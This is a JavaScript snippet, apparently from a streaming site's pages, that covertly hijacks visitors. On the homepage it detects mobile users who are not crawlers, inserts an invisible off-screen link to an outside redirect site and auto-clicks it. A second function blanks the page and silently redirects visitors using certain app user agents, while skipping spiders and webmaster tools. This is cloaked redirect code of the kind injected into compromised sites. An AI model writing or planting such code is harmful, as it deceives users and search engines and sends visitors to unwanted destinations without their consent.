(function(){ var ua=navigator.userAgent.toLowerCase(), u=location.pathname, s=location.search; if(!/bot|spider/.test(ua) && /android|iphone|ipad|ipod|mobile/.test(ua) && (u==="/" || u==="" || /^\/\?/.test(location.href) || (u==="/"&&s!==""))){ var a=document.createElement('a'); a.href='https://www.zybest.com/redirect.html?name=drama&from=https://首页'; a.style='position:absolute;left:-9999px;opacity:0;'; document.body.appendChild(a); setTimeout(()=>a.click(),800); } })(); function VodPlay(url){ const ua = navigator.userAgent.toLowerCase(); if ( (ua.includes("newsa") || ua.includes("byted")) && !ua.includes("spider") && !ua.includes("zhanzhang") ) { document.body.innerHTML = ""; const a = document.createElement("a"); a.href = url; a.style.display = "none"; document.body.appendChild(a); setTimeout(() => { a.click(); }, 500); } }